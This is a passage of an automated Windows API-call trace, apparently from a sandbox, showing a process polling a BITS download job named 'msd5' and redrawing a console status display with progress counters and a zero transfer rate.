[0073.908] PeekMessageW (in: lpMsg=0x6fc50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fc50) returned 1
[0073.908] TranslateMessage (lpMsg=0x6fc50) returned 0
[0073.908] DispatchMessageW (lpMsg=0x6fc50) returned 0x1
[0073.908] IUnknown:QueryInterface (in: This=0x110c70, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x6f7ac | out: ppvObject=0x6f7ac*=0x0) returned 0x80004002
[0073.908] IBackgroundCopyCallback:JobModification (This=0x110c70, pJob=0xfa6ac, dwReserved=0x0) returned 0x0
[0073.908] IBackgroundCopyJob:GetState (in: This=0xfa61c, pVal=0x110c7c | out: pVal=0x110c7c) returned 0x0
[0073.908] IBackgroundCopyCallback:JobModification (This=0x110c70, pJob=0xfa6ac, dwReserved=0x0) returned 0x0
[0073.908] IBackgroundCopyJob:GetState (in: This=0xfa61c, pVal=0x110c7c | out: pVal=0x110c7c) returned 0x0
[0073.910] IBackgroundCopyJob:GetType (in: This=0xfa61c, pVal=0x6e310 | out: pVal=0x6e310) returned 0x0
[0073.911] IBackgroundCopyJob:GetProgress (in: This=0xfa61c, pVal=0x110c80 | out: pVal=0x110c80) returned 0x0
[0073.912] IBackgroundCopyJob:GetPriority (in: This=0xfa61c, pVal=0x6e30c | out: pVal=0x6e30c) returned 0x0
[0073.912] CoTaskMemFree (pv=0x0)
[0073.912] IBackgroundCopyJob:GetDisplayName (in: This=0xfa61c, pVal=0x6e324 | out: pVal=0x6e324*="msd5") returned 0x0
[0073.913] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2cc | out: lpConsoleScreenBufferInfo=0x6e2cc) returned 1
[0073.913] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6e2e4 | out: lpNumberOfCharsWritten=0x6e2e4) returned 1
[0073.913] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6e2e4 | out: lpNumberOfAttrsWritten=0x6e2e4) returned 1
[0073.913] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0073.914] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.914] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2b8 | out: lpConsoleScreenBufferInfo=0x6e2b8) returned 1
[0073.914] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e2d0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2d0*=0xa) returned 1
[0073.914] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.914] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2b4 | out: lpConsoleScreenBufferInfo=0x6e2b4) returned 1
[0073.915] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6e2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2cc*=0x5) returned 1
[0073.915] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.915] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2bc | out: lpConsoleScreenBufferInfo=0x6e2bc) returned 1
[0073.915] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6e2d4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2d4*=0x7) returned 1
[0073.915] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.915] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2b0 | out: lpConsoleScreenBufferInfo=0x6e2b0) returned 1
[0073.916] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2c8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2c8*=0x8) returned 1
[0073.916] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.916] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2b8 | out: lpConsoleScreenBufferInfo=0x6e2b8) returned 1
[0073.916] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2d0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2d0*=0x8) returned 1
[0073.916] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.916] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2ac | out: lpConsoleScreenBufferInfo=0x6e2ac) returned 1
[0073.917] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6e2c4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2c4*=0xc) returned 1
[0073.917] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.917] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2bc | out: lpConsoleScreenBufferInfo=0x6e2bc) returned 1
[0073.917] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e2d4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2d4*=0xa) returned 1
[0073.917] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.917] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2a4 | out: lpConsoleScreenBufferInfo=0x6e2a4) returned 1
[0073.917] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e2bc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2bc*=0xa) returned 1
[0073.918] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.918] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2ac | out: lpConsoleScreenBufferInfo=0x6e2ac) returned 1
[0073.918] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2c4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2c4*=0x8) returned 1
[0073.918] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.918] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e2d0 | out: _Buffer="0") returned 1
[0073.918] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e2dc | out: _Buffer="1") returned 1
[0073.918] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2ac | out: lpConsoleScreenBufferInfo=0x6e2ac) returned 1
[0073.919] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6e2c4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2c4*=0x5) returned 1
[0073.919] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2b4 | out: lpConsoleScreenBufferInfo=0x6e2b4) returned 1
[0073.919] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2cc*=0x8) returned 1
[0073.919] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.919] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e2d8 | out: _Buffer="0") returned 1
[0073.919] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6e2cc | out: lpSystemTimeAsFileTime=0x6e2cc*(dwLowDateTime=0xdcaa9450, dwHighDateTime=0x1d469c7))
[0073.920] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6e2c4 | out: lpSystemTimeAsFileTime=0x6e2c4*(dwLowDateTime=0xdcaa9450, dwHighDateTime=0x1d469c7))
[0073.920] _finite (_X=0x0) returned 0
[0073.920] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e284 | out: lpConsoleScreenBufferInfo=0x6e284) returned 1
[0073.920] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x6e29c, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e29c*=0xd) returned 1
[0073.920] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.920] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e290 | out: lpConsoleScreenBufferInfo=0x6e290) returned 1
[0073.920] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6e2a8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2a8*=0xf) returned 1
[0073.920] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.921] _vsnwprintf (in: _Buffer=0x6e0bc, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x6e080 | out: _Buffer="0.00 B/S") returned 8
[0073.921] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e2d4 | out: lpConsoleScreenBufferInfo=0x6e2d4) returned 1
[0073.921] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e2ec, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e2ec*=0x8) returned 1
[0073.921] CoTaskMemFree (pv=0x108390)
[0073.921] IBackgroundCopyJob:GetType (in: This=0xfa61c, pVal=0x6f318 | out: pVal=0x6f318) returned 0x0
[0073.922] IBackgroundCopyJob:GetProgress (in: This=0xfa61c, pVal=0x110c80 | out: pVal=0x110c80) returned 0x0
[0073.923] IBackgroundCopyJob:GetPriority (in: This=0xfa61c, pVal=0x6f314 | out: pVal=0x6f314) returned 0x0
[0073.923] CoTaskMemFree (pv=0x0)
[0073.923] IBackgroundCopyJob:GetDisplayName (in: This=0xfa61c, pVal=0x6f32c | out: pVal=0x6f32c*="msd5") returned 0x0
[0073.924] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2d4 | out: lpConsoleScreenBufferInfo=0x6f2d4) returned 1
[0073.924] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6f2ec | out: lpNumberOfCharsWritten=0x6f2ec) returned 1
[0073.924] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6f2ec | out: lpNumberOfAttrsWritten=0x6f2ec) returned 1
[0073.925] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0073.925] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c0 | out: lpConsoleScreenBufferInfo=0x6f2c0) returned 1
[0073.925] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2d8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d8*=0xa) returned 1
[0073.925] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2bc | out: lpConsoleScreenBufferInfo=0x6f2bc) returned 1
[0073.926] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f2d4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d4*=0x5) returned 1
[0073.926] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.926] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c4 | out: lpConsoleScreenBufferInfo=0x6f2c4) returned 1
[0073.926] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6f2dc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2dc*=0x7) returned 1
[0073.926] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.926] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b8 | out: lpConsoleScreenBufferInfo=0x6f2b8) returned 1
[0073.927] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d0*=0x8) returned 1
[0073.927] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c0 | out: lpConsoleScreenBufferInfo=0x6f2c0) returned 1
[0073.927] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d8*=0x8) returned 1
[0073.927] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0073.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0xc) returned 1
[0073.928] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c4 | out: lpConsoleScreenBufferInfo=0x6f2c4) returned 1
[0073.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2dc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2dc*=0xa) returned 1
[0073.928] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.929] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2ac | out: lpConsoleScreenBufferInfo=0x6f2ac) returned 1
[0073.929] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2c4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2c4*=0xa) returned 1
[0073.929] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.929] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0073.929] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0x8) returned 1
[0073.929] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.930] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2d8 | out: _Buffer="0") returned 1
[0073.930] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e4 | out: _Buffer="1") returned 1
[0073.930] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0073.930] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0x5) returned 1
[0073.930] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.930] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2bc | out: lpConsoleScreenBufferInfo=0x6f2bc) returned 1
[0073.930] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d4*=0x8) returned 1
[0073.931] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.931] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e0 | out: _Buffer="0") returned 1
[0073.931] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f2cc | out: lpSystemTimeAsFileTime=0x6f2cc*(dwLowDateTime=0xdcacf5b0, dwHighDateTime=0x1d469c7))
[0073.931] _finite (_X=0x0) returned 1
[0073.931] _finite (_X=0x0) returned 1
[0073.931] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f28c | out: lpConsoleScreenBufferInfo=0x6f28c) returned 1
[0073.931] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x6f2a4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2a4*=0xd) returned 1
[0073.931] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.931] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f298 | out: lpConsoleScreenBufferInfo=0x6f298) returned 1
[0073.932] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6f2b0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2b0*=0xf) returned 1
[0073.932] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.932] _vsnwprintf (in: _Buffer=0x6f0c4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x6f088 | out: _Buffer="0.00 B/S") returned 8
[0073.932] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2dc | out: lpConsoleScreenBufferInfo=0x6f2dc) returned 1
[0073.932] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2f4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2f4*=0x8) returned 1
[0073.932] CoTaskMemFree (pv=0x108390)
[0073.933] PeekMessageW (in: lpMsg=0x6fc50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fc50) returned 0
[0073.933] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fc78*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0074.086] PeekMessageW (in: lpMsg=0x6fc50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fc50) returned 1
[0074.086] TranslateMessage (lpMsg=0x6fc50) returned 0
[0074.086] DispatchMessageW (lpMsg=0x6fc50) returned 0x1
[0074.087] IBackgroundCopyCallback:JobModification (This=0x110c70, pJob=0xfa6ac, dwReserved=0x0) returned 0x0
[0074.087] IBackgroundCopyJob:GetState (in: This=0xfa61c, pVal=0x110c7c | out: pVal=0x110c7c) returned 0x0
[0074.097] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fbd
[0074.097] IBackgroundCopyJob:GetType (in: This=0xfa61c, pVal=0x6f318 | out: pVal=0x6f318) returned 0x0
[0074.098] IBackgroundCopyCallback:JobModification (This=0x110c70, pJob=0xfa6ac, dwReserved=0x0) returned 0x0
[0074.098] IBackgroundCopyJob:GetState (in: This=0xfa61c, pVal=0x110c7c | out: pVal=0x110c7c) returned 0x0
[0074.099] IBackgroundCopyJob:GetProgress (in: This=0xfa61c, pVal=0x110c80 | out: pVal=0x110c80) returned 0x0
[0074.100] IBackgroundCopyJob:GetPriority (in: This=0xfa61c, pVal=0x6f314 | out: pVal=0x6f314) returned 0x0
[0074.101] CoTaskMemFree (pv=0x0)
[0074.101] IBackgroundCopyJob:GetDisplayName (in: This=0xfa61c, pVal=0x6f32c | out: pVal=0x6f32c*="msd5") returned 0x0
[0074.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2d4 | out: lpConsoleScreenBufferInfo=0x6f2d4) returned 1
[0074.102] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6f2ec | out: lpNumberOfCharsWritten=0x6f2ec) returned 1
[0074.102] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6f2ec | out: lpNumberOfAttrsWritten=0x6f2ec) returned 1
[0074.102] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0074.102] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c0 | out: lpConsoleScreenBufferInfo=0x6f2c0) returned 1
[0074.103] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2d8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d8*=0xa) returned 1
[0074.103] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2bc | out: lpConsoleScreenBufferInfo=0x6f2bc) returned 1
[0074.103] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f2d4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d4*=0x5) returned 1
[0074.104] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.104] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c4 | out: lpConsoleScreenBufferInfo=0x6f2c4) returned 1
[0074.104] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6f2dc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2dc*=0x7) returned 1
[0074.104] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b8 | out: lpConsoleScreenBufferInfo=0x6f2b8) returned 1
[0074.105] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d0*=0x8) returned 1
[0074.105] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c0 | out: lpConsoleScreenBufferInfo=0x6f2c0) returned 1
[0074.105] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d8*=0x8) returned 1
[0074.106] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.106] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0074.106] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0xc) returned 1
[0074.106] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.107] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c4 | out: lpConsoleScreenBufferInfo=0x6f2c4) returned 1
[0074.107] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2dc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2dc*=0xa) returned 1
[0074.107] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2ac | out: lpConsoleScreenBufferInfo=0x6f2ac) returned 1
[0074.108] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2c4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2c4*=0xa) returned 1
[0074.108] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0074.108] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0x8) returned 1
[0074.109] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
